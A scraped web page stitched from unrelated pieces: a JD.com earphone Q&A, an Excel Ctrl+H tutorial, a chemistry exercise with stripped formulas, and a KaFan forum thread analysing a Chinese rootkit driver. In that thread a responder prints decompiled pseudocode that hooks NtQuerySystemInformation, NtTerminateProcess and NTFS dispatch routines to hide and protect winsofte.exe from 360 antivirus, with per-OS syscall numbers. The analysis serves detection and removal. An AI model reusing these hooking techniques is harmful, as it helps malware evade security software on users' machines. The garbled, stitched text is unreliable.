跑了，我利魔方是不是跑路了可以找H艘

点击联系发帖人 时间：2018-03-22 04:42

利魔方是不是跑路了

商品名称：
京东价：暂无报价
评价得分：
咨询内容：
就是指示灯一闪一闪的
手机怎么也搜索不到耳机名称
该怎么处理？有方法？
京东回复：
您好！配对步骤：1、长按多功能键将蓝牙耳机开机（蓝灯恒亮），打开手机蓝牙搜索功能，手机会显示找到“H”或bluedio”。手机选择接受即可。（切记：要长按耳机开机键直到耳机指示灯蓝灯常亮后才放手，这样耳机才能进入配对状态哦；如耳机指示灯蓝灯一闪一闪就无法进入配对状态的）。感谢您对京东的支持！祝您购物愉快！
发表咨询：
声明：您可在购买前对产品包装、颜色、运输、库存等方面进行咨询，我们有专人进行回复！因厂家随时会更改一些产品的包装、颜色、产地等参数，所以该回复仅在当时对提问者有效，其他网友仅供参考！咨询回复的工作时间为：周一至周五，9:00至18:00，请耐心等待工作人员回复。
咨询类型：
库存及配送
发票及保修
促销及赠品
京东承诺：商品均为原装正品行货，自带机打发票，严格执行国家三包政策，享受全国联保服务。
功能咨询：咨询商品功能建议您拨打各品牌的官方客服电话，以便获得更准确的信息。
发货时间：现货：下单后一日内即可发货；在途：一般1-2天发货；预订：一般1-6天可发货；无货：已售完，相应物流中心覆盖地区内的用户不能购买
运&&&&费：如需查看快递运输收费标准及免运费规则，
货到付款：如需查看开通货到付款地区及运费，
上门自提：上门自提不收取运费，如需查看全部自提点位置、地图、注意事项，
物流中心：京东商城拥有北京、上海、广州三个物流中心，各物流中心覆盖不同的城市，
限&&&&额：如需查看各银行在线支付限额，
大额支付：快钱支付中的招行、工行、建行、农行、广发支持大额支付，最高单笔一次支付10000元
分期付款：单个商品价格在500元以上，可使用中国银行、招商银行发行的信用卡申请分期付款，
货到付款：如需查看开通货到付款地区及运费，
京东承诺：商品均为原装正品行货，自带机打发票，严格执行国家三包政策，享受全国联保服务。
发票类型：京东商城所售商品均自带机打发票，在提供相关企业资料证明后，可申请开取增值税发票。
退换货：京东商城为您提供完善的退换货服务，
咨询内容：
多品类齐全，轻松购物
快多仓直发，极速配送
好正品行货，精致服务
省天天低价，畅选无忧Ctrl+H的秘密，你还真不一定都知道Ctrl+H的秘密，你还真不一定都知道第一人称百家号今天Kevin和小伙伴们说说Excel中的查找和替换功能。先预告一下，前半部分是基础介绍，实例应用在后面哦。小伙伴们可能都知道了，在Excel中，只要按Ctrl+F，就可以打开“查找”对话框，按Ctrl+H打开“替换”对话框。这两个对话框一对孪生兄弟，有查找的地方，就有替换，而且这两个功能的处理规则也完全一样：另外，在查找或替换操作时，如果是在整个工作表进行，可以单击任意一个单元格，然后调出查找对话框。如果是只在A列查找，可以先选中A列，然后再打开“查找和替换”对话框。查找替换的界面看着非常简单，但是Kevin说，里面可藏着很多鲜为人知的小秘密哦。当我们点击这个界面中的【选项】按钮时，就会看到更多的选项了：在“范围”的下拉列表中可以根据需要选择“工作簿”和“工作表”。在“搜索”的右侧下拉列表中可以选择按行、按列查找，相当于指定一个查找的优先级，一般这里不需要我们单独设置。在“查找范围”右侧的下拉列表中，可以选择公式、值和批注。批注查找比较容易理解，公式和值有什么区别呢？咱们举个例子，假如A1中的公式是：=1+21.按公式查找1或是2，这时查找的是公式中的内容，而不是值，所以能找到。2.按公式查找3，这时3是公式显示的结果，也就是值，所以不能找到。感觉有点像绕口令，哈哈哈。在右侧还有三个复选框，分别是区分大小写、单元格匹配和区分全/半角。区分大小写和区分全/半角，就是只查找符合指定特征的内容。这个单元格匹配嘛，就是查找结果和单元格的内容要完全一致，不能有多余的字符。1、将0分替换为“补考”如下图，要将成绩表中的0替换为补考，如果直接替换，就会出现小问题：其实只要在替换时选择“单元格匹配”就一切OK：2、快速转置如下图所示，A列是一些人员姓名，为了便于打印，需要转换为多行多列才可以。Kevin说，不熟悉函数公式不要紧，使用替换功能也可以快速完成。3、换行显示如下图所示，要让同一个单元格中的姓名和电话上下显示，也可以使用替换功能哦。在替换对话框中，查找内容输入空格（用于间隔姓名电话的符号），光标放到“替换为”编辑框中，按Ctrl+J键。4、字符截取如下图所示，要删除括号内的电话，只保留姓名。也可以使用替换完成。在替换对话框中，查找内容输入（*）。这里的星号是通配符的意思，就像扑克中的大王，可以表示任意多个字符。除此之外，还有一个小王，就是半角的问号?，他的作用是表示任意一个字符。在“替换为”编辑框中不输入任何内容，直接点全部替换就OK了。5、替换星号如下图所示，要将规格中的星号替换为×，如果直接替换，就坏菜了。这是星号的特殊身份造成的，要精确替换星号，还需要在星号前面加上一个小尾巴 ~。6、整理不规范日期不规范日期的处理方法前几天咱们刚刚说过，小伙伴们还记得吗？7、根据格式查找替换除了以上的几种典型应用，还可以根据格式查找和替换。比如将工作表中单元格数据为红色的数据改为蓝色，可以单击“查找和替换”对话框中“格式”按钮右侧的小箭头，在弹出的下拉列表中选择“从单元格选择格式”，然后选择一个包含所需查找格式的单元格，即可按选定的格式进行查找。然后单击“替换为”的“格式”，进行单元格格式设定，最后全部替换就好了。这个操作平时的应用不多，所以Kevin就偷个懒，不录制动画演示了。怎么样，Ctrl+H的秘密还有哪些？你都了解吗？好了，今天的内容就是这些吧，祝各位小伙伴们一天好心情。本文仅代表作者观点，不代表百度立场。系作者授权百家号发表，未经许可不得转载。第一人称百家号最近更新：简介:用第一人称记录眼前所有的发生作者最新文章相关文章碳原子最多形成四个单键,氧原子最多形成两个;甲烷是正四面体结构,四个氢原子完全等效;用总反应式减去负极反应式得正极反应式,根据甲烷完全燃烧生成气体和液态水时放出的热量可求出甲烷放出的热量;根据获取途径的能源消耗角度来分析.
解:根据碳的四价键结构,氧的二价键架构,所有可能的结构简式为或,故答案为:,;天然气的主要成分是甲烷,根据分子式,可推测的空间结构只有平面正方形和正四面体两种可能.若为平面正方形结构,则其二元取代物有两种同分异构体,而正四面体的二元取代物不存在同分异构体,故答案为:;负极反应式为:,用总反应式减去负极反应式得正极反应式:
,甲烷的摩尔质量是,甲烷完全燃烧生成气体和液态水时放出的热量,放出的热量为:;故答案为:(或)电解水消耗大量的电能,锌和硫酸反应也不符合工业上大量生产,只有利用太阳能使海水光解才是最经济的方法,氢气储存和运输时容易爆炸,故答案为:贮存或运输.
本题考查有机物结构,电极反应式和热化学方程式的书写,可以根据所学知识来回答,难度不大.
1403@@3@@@@使用化石燃料的利弊及新能源的开发@@@@@@126@@Chemistry@@Senior@@$126@@2@@@@化学反应与能量@@@@@@21@@Chemistry@@Senior@@$21@@1@@@@化学反应原理@@@@@@3@@Chemistry@@Senior@@$3@@0@@@@高中化学@@@@@@-1@@Chemistry@@Senior@@$1399@@3@@@@电极反应和电池反应方程式@@@@@@126@@Chemistry@@Senior@@$126@@2@@@@化学反应与能量@@@@@@21@@Chemistry@@Senior@@$21@@1@@@@化学反应原理@@@@@@3@@Chemistry@@Senior@@$3@@0@@@@高中化学@@@@@@-1@@Chemistry@@Senior@@$1400@@3@@@@常见化学电源的种类及其工作原理@@@@@@126@@Chemistry@@Senior@@$126@@2@@@@化学反应与能量@@@@@@21@@Chemistry@@Senior@@$21@@1@@@@化学反应原理@@@@@@3@@Chemistry@@Senior@@$3@@0@@@@高中化学@@@@@@-1@@Chemistry@@Senior@@
@@21@@3##@@21@@3##@@21@@3
求解答学习搜索引擎 | 有效地利用现有新能源和开发新能源已受到各国的重视.(1)可用改进汽油组成的办法来改善汽油的燃烧性能.例如,在汽油中加入乙醇来生产"无铅汽油".乙醇的分子式为{{C}_{2}}{{H}_{6}}O,试根据C,H,O成键的特点,写出{{C}_{2}}{{H}_{6}}O所有可能的结构式或结构简式___.(2)天然气的主要的成分是甲烷,其燃烧产物无毒,热值高,管道输送方便,将成为我国西部开发的重点之一.能说明甲烷是正四面体而非正方形平面结构的理由是___.(填写编号,多选倒扣分)\textcircled{1}其一氯取代物不存在同分异构体
　　　　　　\textcircled{2}其二氯取代物不存在同分异构体\textcircled{3}其三氯取代物不存在同分异构体
\textcircled{4}其四氯取代物不存在同分异构体(3)将两个石墨电极插人KOH溶液中,向两极分别通入C{{H}_{4}}和{{O}_{2}},构成甲烷燃料电池.通入C{{H}_{4}}的一极电极反应式是:C{{H}_{4}}+10O{{H}^{-}}-8{{e}^{-}}=C{{{{O}_{3}}}^{2-}}+7{{H}_{2}}O;通入{{O}_{2}}的一极,其电极反应式是___.已知4g甲烷完全燃烧生成C{{O}_{2}}气体和液态水时放出222.5kJ的热量,则甲烷燃烧的热化学方程式为___;(4)氢能是人类未来的理想能源.1980年我国首次制成一辆燃氢汽车,乘员12人,以50km/h行驶了40km.为了有效发展民用氢能源,首先必须制得廉价的氢气.下列既可供开发又消耗较低经济的制氢方法是___(填写编号,多选倒扣分)\textcircled{1}电解水
　　　\textcircled{2}锌和稀硫酸反应
　　\textcircled{3}光解海水其次,制得纯氢气后,还需要解决的问题是___.(写出其中的一个)请完成以下验证码
查看: 6256|回复: 6
hmpgprotect.dll 百度搜不到，怀疑是新出的病毒
maxwelldemon
本帖最后由 maxwelldemon 于
10:09 编辑
6月22日发现的。当时我使用迅雷时不小心点出了迅雷的什么游戏盒子之类的东西，然后迅雷就给我安装游戏盒子（好像是这个名字）。我不玩游戏，就把它卸载，结果在C:\Program Files\ 文件夹下顺便发现了一个叫“winsofte”的文件夹，显示是6月21日早晨才创建和修改的。而那时我没主动装过什么东西，只是下午装了在pchome下的ADOBE的PDF阅读器。
这个叫“winsofte”的文件夹里面只有两个东西：hmpgprotect.dll 和 nkfdha78dry9fjdka.sys 。前一个东西百度搜不到，也没数字签名；后一个百度搜到也就是最近几天有人问这个东西，有人传到多引擎扫描过，只有两个报毒。看来是个新东西。
我的电脑当时似乎也没很明显的异常，就是这几天打开谷歌浏览器时，一开始总是失去响应，要卡住一会儿才能开始使用。我的电脑本来配置就低，所以感觉也不明显。
然后我采取了如下措施：先用江民扫描这两个东西，发现无法正常扫描。进安全模式扫也无收获。重启用江民的bootscan扫完了C盘，没有发现。用360安全卫士体检、查杀木马，也没收获。下了360最新版的系统急救箱，扫描也无收获。
我把这两个东西的后缀分别改成.txt，发现里面提到了一些常用浏览器的名称，还提到了一些安全软件的名称。其中nkfdha78dry9fjdka.sys里面有如下代码：
C:\Users\Microsoft\Desktop\0427\Release\fuckav32.pdb
我怀疑fuckav是能把杀毒软件干掉的东西，怀疑是它让我的江民无法扫描这个文件夹。看来很可能是个病毒。我想删除这个文件夹，结果里面的文件被占用，无法删。我想上卡饭论坛，结果总是无法登录。
最后，我用Sreng扫描了系统，发现启动项里有 nkfdha78dry9fjdka.sys 这个驱动。我用Sreng禁止了这个驱动启动。重启后这个文件夹果然可删了，占用解除了（不过我还没删，因为还没彻底弄清）。江民也能扫描这个文件夹了，尽管还是没扫出东西。谷歌浏览器打开时也没卡住了。甚至卡饭论坛也能正常登录了。
附件中就是“winsofte”这个文件夹里的两个可疑文件。哪位高人看看这究竟是什么病毒，怎样根除？谢谢！
(81.92 KB, 下载次数: 1855)
13:43 上传
点击文件名下载附件
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
几天后升级了360安全卫士，扫木马后把它干掉了。那几天论坛好像有问题，总是很难登录上，登上了发帖也很困难，就没及时反馈。加上工作忙，后来就忘了。请见谅。
火绒kill了
(32.08 KB, 下载次数: 37)
22:44 上传
360发现木马
(21.85 KB, 下载次数: 35)
23:17 上传
比较新的病毒，应该是后出来的，应该还附带一个驱动
nkfdha78dry9fjdka.sys
挂钩FSD禁止360打开其文件挂钩NTQUERYINFORMATIONPROCESS,NTQUERYSYSTEMINFORMATION,NTREADFFILE,NTTERMINATEPROCESS禁止枚举打开其进程。名字固定为winsofte.exe
char __stdcall checkProcNamewinsofte_exe(PCUNICODE_STRING String2)
&&char v1; // bl@1
&&UNICODE_STRING DestinationS // [sp+4h] [bp-8h]@1
&&RtlInitUnicodeString(&DestinationString, L&winsofte.exe&);
&&if ( RtlEqualUnicodeString(&DestinationString, String2, 0) == 1 )
& & v1 = 1;
&&return v1;
int __stdcall MyNtQuerysystemInformation(int SystemInformationClass, int SystemInformation, int SystemInformationLength, int ReturnLength)
&&int v4; // edi@1
&&int RetA // esi@1
&&int v6; // esi@15
&&PVOID *v8; // [sp+10h] [bp+0h]@0
&&int ReturnL // [sp+24h] [bp+14h]@1
&&_InterlockedExchangeAdd((signed __int32 *)&dword_2B18C, 1u);
&&RetAddress = GetRetAddress(v8);
&&ReturnLengtha = NtQuerysystemInformation(
& && && && && && &&&SystemInformationClass,
& && && && && && &&&SystemInformation,
& && && && && && &&&SystemInformationLength,
& && && && && && &&&ReturnLength);
&&if ( ReturnLengtha &= 0
& & && RetAddress
& & && SystemInformationClass == 5& && && && &&&// SystemProcessesAndThreadsInformation
& & && (RetAddress &= (unsigned int)Base_360selfprotection && RetAddress & (unsigned int)360selfprotectionPlusSize
& &&&|| RetAddress &= (unsigned int)Base_Qutmdrv && RetAddress & (unsigned int)QutmdrvPlusSize
& &&&|| RetAddress &= (unsigned int)Base_360AvFlt && RetAddress & (unsigned int)360AvFltPlusSize
& &&&|| RetAddress &= (unsigned int)Base_360Box && RetAddress & (unsigned int)360BoxPlusSize
& &&&|| RetAddress &= (unsigned int)Base_Bapidrv && RetAddress & (unsigned int)BapidrvPlusSize
& &&&|| CheckIsCurrent360Proc() == 1) )
& & v6 = SystemI
& & while ( v6 )
& && &if ( checkProcNamewinsofte_exe((PCUNICODE_STRING)(v6 + 0x38)) == 1 && v4 )
& && &&&if ( *(_DWORD *)v6 )
& && && & *(_DWORD *)v4 += *(_DWORD *)v6;
& && &&&else
& && && & *(_DWORD *)v4 = 0;
& && &v4 = v6;
& && &if ( *(_DWORD *)v6 )
& && &&&v6 += *(_DWORD *)v6;
& && &else
& && &&&v6 = 0;
&&_InterlockedExchangeAdd((signed __int32 *)&dword_2B18C, 0xFFFFFFFFu);
&&return ReturnL
\\.\hjlkfdajklfed3dfa
用急救箱强力模式查杀吧，对付所有高级ROOTKIT通杀。
NTSTATUS __stdcall CreateProcessNotifyRoutine(int ParentId, PVOID ProcessId, char bCreate)
&&if ( bCreate )
& & sub_125AC(ProcessId, ParentId);
& & nullsub_1((int)ProcessId);
&&return PsSetLoadImageNotifyRoutine((PLOAD_IMAGE_NOTIFY_ROUTINE)LoadImageNotifyRoutine);
这垃圾程序会挂进程创建来注入，恶心的是每次进程创建会注册LOADIMAGECALLBACK，估计等系统起来的时候，LOADIMAGECallBACK都被占满了，一边让后来的杀软挂注册这个CALLBACK失败。同时挂钩NFTS禁止其他进程访问其保护文件。
char __stdcall CopeWithNtfsReal(char bHook)
&&signed __int32 v1; // eax@3
&&UNICODE_STRING DestinationS // [sp+4h] [bp-8h]@4
&&if ( bHook || !NtfsDrvObj )
& & RtlInitUnicodeString(&DestinationString, &\\&);
& & if ( ObReferenceObjectByName(&DestinationString, 576, 0, 0, IoDriverObjectType, 0, 0, &NtfsDrvObj) & 0 )
& && &NtfsDrvObj = 0;
& && &return 0;
& & OldNtfsCreate = *(int (__stdcall **)(_DWORD, _DWORD))(NtfsDrvObj + 0x38);
& & OldNtfsSetInformation = *(_DWORD *)(NtfsDrvObj + 0x50);
& & OldNtfsRead = *(int (__stdcall **)(_DWORD, _DWORD))(NtfsDrvObj + 0x44);
& & OldNtfsFilesystemControl = *(_DWORD *)(NtfsDrvObj + 0x6C);
& & OldNtfsDirectoryControl = *(_DWORD *)(NtfsDrvObj + 0x68);
& & _InterlockedExchange((signed __int32 *)(NtfsDrvObj + 0x38), (signed __int32)MyNtfsCreate);
& & _InterlockedExchange((signed __int32 *)(NtfsDrvObj + 0x50), (signed __int32)MyNtfsSetInformation);
& & _InterlockedExchange((signed __int32 *)(NtfsDrvObj + 0x44), (signed __int32)MyNtfsRead);
& & _InterlockedExchange((signed __int32 *)(NtfsDrvObj + 0x6C), (signed __int32)MyNtfsFilesystemControl);
& & v1 = (signed __int32)MyNtfsDirectoryC
& & _InterlockedExchange((signed __int32 *)(NtfsDrvObj + 0x38), (signed __int32)OldNtfsCreate);
& & _InterlockedExchange((signed __int32 *)(NtfsDrvObj + 0x50), OldNtfsSetInformation);
& & _InterlockedExchange((signed __int32 *)(NtfsDrvObj + 0x44), (signed __int32)OldNtfsRead);
& & _InterlockedExchange((signed __int32 *)(NtfsDrvObj + 0x6C), OldNtfsFilesystemControl);
& & v1 = OldNtfsDirectoryC
&&_InterlockedExchange((signed __int32 *)(NtfsDrvObj + 0x68), v1);
&&return 1;
int __stdcall MyNtfsCreate(int DeviceObject, PIRP Irp)
&&unsigned int CurrentProcessId; // eax@3
&& // eax@5
&&const WCHAR SourceS // [sp+Ch] [bp-380h]@3
&&char v5; // [sp+25Ch] [bp-130h]@1
&&char v6; // [sp+25Dh] [bp-12Fh]@1
&&ULONG_PTR v7; // [sp+388h] [bp-4h]@1
&&int v8; // [sp+38Ch] [bp+0h]@1
&&v7 = (unsigned int)&v8 ^ __security_
&&memset(&v6, 0, 0x12Bu);
&&if ( FsdCtrlFlag
& & && (sub_130E4(*((_DWORD *)Irp-&Tail.Overlay.CurrentStackLocation + 6), &v5), sub_13A0E(&v5))
& & && (memset((void *)&SourceString, 0, 0x250u),
& && &&&CurrentProcessId = (unsigned int)PsGetCurrentProcessId(),
& && &&&GetProcNameFromPid(CurrentProcessId, (WCHAR *)&SourceString, 296u))
& & && !CheckAllowProcName(&SourceString) )
& & Irp-&IoStatus.Status = 0xC0000022u;
& & Irp-&IoStatus.Information = 0;
& & IofCompleteRequest(Irp, 0);
& & result = 0xC0000022u;
& & result = OldNtfsCreate(DeviceObject, Irp);
当然因为要注入，所以一下程序都放行
ProcNameArray& &dd offset aExplorer_ DATA XREF: CheckAllowProcName+5r
.data:& && && && && && && && && && && && && &&&; CheckAllowProcName+12o ...
.data:& && && && && && && && && && && && && &&&; &*\\explorer.exe*&
.data:0002962C& && && && && &&&dd offset aWinsofte_exe_1 ; &*\\winsofte.exe*&
.data:& && && && && &&&dd offset aRegedit_exe&&; &*\\regedit.exe*&
.data:& && && && && &&&dd offset aCsrss_exe& & ; &*\\csrss.exe*&
.data:& && && && && &&&dd offset aDllhost_exe&&; &*\\dllhost.exe*&
.data:0002963C& && && && && &&&dd offset aHjlkfdajklfed3 ; &*\\hjlkfdajklfed3dfa.exe*&
.data:& && && && && &&&dd offset aMmc_exe& && &; &*\\mmc.exe*&
.data:& && && && && &&&dd offset aServices_ &*\\services.exe*&
.data:& && && && && &&&dd offset aUserinit_ &*\\userinit.exe*&
.data:0002964C& && && && && &&&dd offset aOsa_exe& && &; &*\\osa.exe*&
.data:& && && && && &&&dd offset aWinlogon_ &*\\winlogon.exe*&
.data:& && && && && &&&dd offset aLsass_exe& & ; &*\\lsass.exe*&
.data:& && && && && &&&dd offset aWininit_exe&&; &*\\wininit.exe*&
.data:0002965C& && && && && &&&dd offset aSystem_exe& &; &*\\system.exe*&
.data:& && && && && &&&dd offset aSmss_exe& &&&; &*\\smss.exe*&
.data:& && && && && &&&dd offset aSpoolsv_exe&&; &*\\spoolsv.exe*&
.data:& && && && && &&&dd offset aIexplore_exe_0 ; &*\\iexplore.exe*&
.data:0002966C& && && && && &&&dd offset aChrome_exe_0 ; &*\\chrome.exe*&
.data:& && && && && &&&dd offset aFirefox_exe_0 ; &*\\firefox.exe*&
.data:& && && && && &&&dd offset a360se_exe_0&&; &*\\360se.exe*&
.data:& && && && && &&&dd offset aSogouexplore_0 ; &*\\sogouexplorer.exe*&
.data:0002967C& && && && && &&&dd offset aMaxthon_exe_0 ; &*\\maxthon.exe*&
.data:& && && && && &&&dd offset aLiebao_exe_0 ; &*\\liebao.exe*&
.data:& && && && && &&&dd offset aQqbrowser_ex_0 ; &*\\qqbrowser.exe*&
.data:& && && && && &&&dd offset aBaidubrowser_0 ; &*\\baidubrowser.exe*&
.data:0002968C& && && && && &&&dd offset aHao123browse_0 ; &*\\hao123browser.exe*&
.data:& && && && && &&&dd offset a2345explorer_0 ; &*\\2345explorer.exe*&
.data:& && && && && &&&dd offset aTheworld_exe_0 ; &*\\theworld.exe*&
.data:& && && && && &&&dd offset aTtraveler_ex_0 ; &*\\ttraveler.exe*&
.data:0002969C& && && && && &&&dd offset unk_176D0
看它里面的HARDCODE 应该支持xp，win7（SP1）,WIN8 ,不支持WIN8.1
int __cdecl HardCodeInit()
&&int BuildN // eax@1
&&BuildNumber = (unsigned __int16)NtBuildN
&&if ( 2600 == (_WORD)NtBuildNumber )& && && &&&// xp
& & SectionObject = 0x138u;
& & dword_2B194 = 0x140u;
& & ProcNameOffset = 0x174u;
& & NtReadFileId = 183;
& & *(_DWORD *)NtQueryInformationProcessId = 154;
& & NtQuerysystemInformationId = 173;
& & NtTerminateProcessId = 257;
& & NtDeleteKeyId = 63;
& & NtDeleteValueKeyId = 65;
& & NtSetValueKeyId = 247;
& & if ( 7600 == (_WORD)BuildNumber || 7601 == (_WORD)BuildNumber )// win7 and sp1
& && &SectionObject = 0x128u;
& && &dword_2B194 = 0x13Au;
& && &ProcNameOffset = 0x16Cu;
& && &NtReadFileId = 273;
& && &*(_DWORD *)NtQueryInformationProcessId = 234;
& && &NtQuerysystemInformationId = 261;
& && &NtTerminateProcessId = 370;
& && &NtDeleteKeyId = 103;
& && &NtDeleteValueKeyId = 106;
& && &NtSetValueKeyId = 358;
& && &if ( 9200 == (_WORD)BuildNumber )& && && &// win8
& && &&&SectionObject = 0x11Cu;
& && &&&dword_2B194 = 0x15Au;
& && &&&ProcNameOffset = 0x170u;
& && &&&NtReadFileId = 0x87u;
& && &&&*(_DWORD *)NtQueryInformationProcessId = 0xB0u;
& && &&&NtQuerysystemInformationId = 0x95u;
&&dword_2B18C = 0;
&&return BuildNumber
主要是针对360的驱动级对抗，其他杀软没做驱动级对抗，应该都能处理。
NTSTATUS __stdcall MyNtTerminateProcess(HANDLE Handle, NTSTATUS a2)
&&NTSTATUS // eax@2
&& // eax@3
&&KPROCESSOR_MODE v4; // al@5
&&void *v5; // ebx@6
&&int v6; // [sp+8h] [bp-260h]@7
&&int v7; // [sp+Ch] [bp-25Ch]@7
&&PVOID O // [sp+10h] [bp-258h]@1
&&const WCHAR SourceS // [sp+14h] [bp-254h]@3
&&ULONG_PTR v10; // [sp+264h] [bp-4h]@1
&&int v11; // [sp+268h] [bp+0h]@1
&&v10 = (unsigned int)&v11 ^ __security_
&&Object = 0;
&&if ( byte_296A8 )
& & pid = (unsigned int)PsGetCurrentProcessId();
& & if ( GetProcNameFromPid(pid, (WCHAR *)&SourceString, 0x128u) && CheckAllowProcName(&SourceString)
& && &|| (v4 = ExGetPreviousMode(),
& && && & ObReferenceObjectByHandle(Handle, 1u, (POBJECT_TYPE)PsProcessType, v4, &Object, 0) & 0)
& && &|| (v5 = (void *)PsGetProcessId(Object), v5 == PsGetCurrentProcessId())
& && &|| sub_14B26((char *)Handle, (int)&v7, (int)&v6) != 1
& && &|| !sub_122A4(L&*\\winsofte.exe*&, v7) )
& && &result = NtTerminateProcess(Handle, a2);
& && &result = 0;
& & result = NtTerminateProcess(Handle, a2);
NTSTATUS __stdcall MyNtQueryInformationProcess(HANDLE Object, PROCESSINFOCLASS a2, void *a3, ULONG a4, ULONG *a5)
&&int v5; // esi@1
&&NTSTATUS v6; // ebx@1
&&int v8; // [sp+Ch] [bp-Ch]@13
&&PVOID VirtualA // [sp+10h] [bp-8h]@1
&&PVOID P; // [sp+14h] [bp-4h]@13
&&void *v11; // [sp+18h] [bp+0h]@1
&&_InterlockedExchangeAdd((signed __int32 *)&dword_2B18C, 1u);
&&VirtualAddress = v11;
&&v5 = GetRetAddress((PVOID *)v11);
&&v6 = NtQueryInformationProcess(Object, a2, a3, a4, a5);
&&if ( v6 &= 0
&&&&&& (v5 &= (unsigned int)Base_360selfprotection && v5 & (unsigned int)360selfprotectionPlusSize
& &&&|| v5 &= (unsigned int)Base_Qutmdrv && v5 & (unsigned int)QutmdrvPlusSize
& &&&|| v5 &= (unsigned int)Base_360AvFlt && v5 & (unsigned int)360AvFltPlusSize
& &&&|| v5 &= (unsigned int)Base_360Box && v5 & (unsigned int)360BoxPlusSize
& &&&|| v5 &= (unsigned int)Base_Bapidrv && v5 & (unsigned int)BapidrvPlusSize)
& & && sub_14B26((char *)Object, (int)&P, (int)&v8) == 1 )
& & if ( CheckProtectFileName((const wchar_t *)P) == 1 )
& && &v6 = 0xC0000001u;
& & ExFreePoolWithTag(P, 0);
&&_InterlockedExchangeAdd((signed __int32 *)&dword_2B18C, 0xFFFFFFFFu);
&&return v6;
int __stdcall MyNtQuerysystemInformation(int SystemInformationClass, int SystemInformation, int SystemInformationLength, int ReturnLength)
&&int v4; // edi@1
&&int RetA // esi@1
&&int v6; // esi@15
&&PVOID *v8; // [sp+10h] [bp+0h]@0
&&int ReturnL // [sp+24h] [bp+14h]@1
&&_InterlockedExchangeAdd((signed __int32 *)&dword_2B18C, 1u);
&&RetAddress = GetRetAddress(v8);
&&ReturnLengtha = NtQuerysystemInformation(
& && && && && && &&&SystemInformationClass,
& && && && && && &&&SystemInformation,
& && && && && && &&&SystemInformationLength,
& && && && && && &&&ReturnLength);
&&if ( ReturnLengtha &= 0
& & && RetAddress
& & && SystemInformationClass == 5& && && && &&&// SystemProcessesAndThreadsInformation
& & && (RetAddress &= (unsigned int)Base_360selfprotection && RetAddress & (unsigned int)360selfprotectionPlusSize
& &&&|| RetAddress &= (unsigned int)Base_Qutmdrv && RetAddress & (unsigned int)QutmdrvPlusSize
& &&&|| RetAddress &= (unsigned int)Base_360AvFlt && RetAddress & (unsigned int)360AvFltPlusSize
& &&&|| RetAddress &= (unsigned int)Base_360Box && RetAddress & (unsigned int)360BoxPlusSize
& &&&|| RetAddress &= (unsigned int)Base_Bapidrv && RetAddress & (unsigned int)BapidrvPlusSize
& &&&|| CheckIsCurrent360Proc() == 1) )
& & v6 = SystemI
& & while ( v6 )
& && &if ( checkProcNamewinsofte_exe((PCUNICODE_STRING)(v6 + 0x38)) == 1 && v4 )
& && &&&if ( *(_DWORD *)v6 )
& && && & *(_DWORD *)v4 += *(_DWORD *)v6;
& && &&&else
& && && & *(_DWORD *)v4 = 0;
& && &v4 = v6;
& && &if ( *(_DWORD *)v6 )
& && &&&v6 += *(_DWORD *)v6;
& && &else
& && &&&v6 = 0;
&&_InterlockedExchangeAdd((signed __int32 *)&dword_2B18C, 0xFFFFFFFFu);
&&return ReturnL
char __cdecl CheckIsCurrent360Proc()
&&const char *CurrentP // edi@1
&&char b360P // [sp+Bh] [bp-1h]@1
&&b360Proc = 0;
&&CurrentProcess = (char *)IoGetCurrentProcess() + ProcNameO
if ( !strnicmp(CurrentProcess, &360Tray.exe&, 0xFu)
& & || !strnicmp(CurrentProcess, &360Safe.exe&, 0xFu)
& & || !strnicmp(CurrentProcess, &360sd.exe&, 0xFu)
& & || !strnicmp(CurrentProcess, &360rp.exe&, 0xFu)
& & || !strnicmp(CurrentProcess, &ZhuDongFangYu.e&, 0xFu) )
& & b360Proc = 1;
&&return b360P
Copyright & KaFan &KaFan.cn All Rights Reserved.
Powered by Discuz! X3.4( 苏ICP备号 ) GMT+8,}

叫爱嘘网络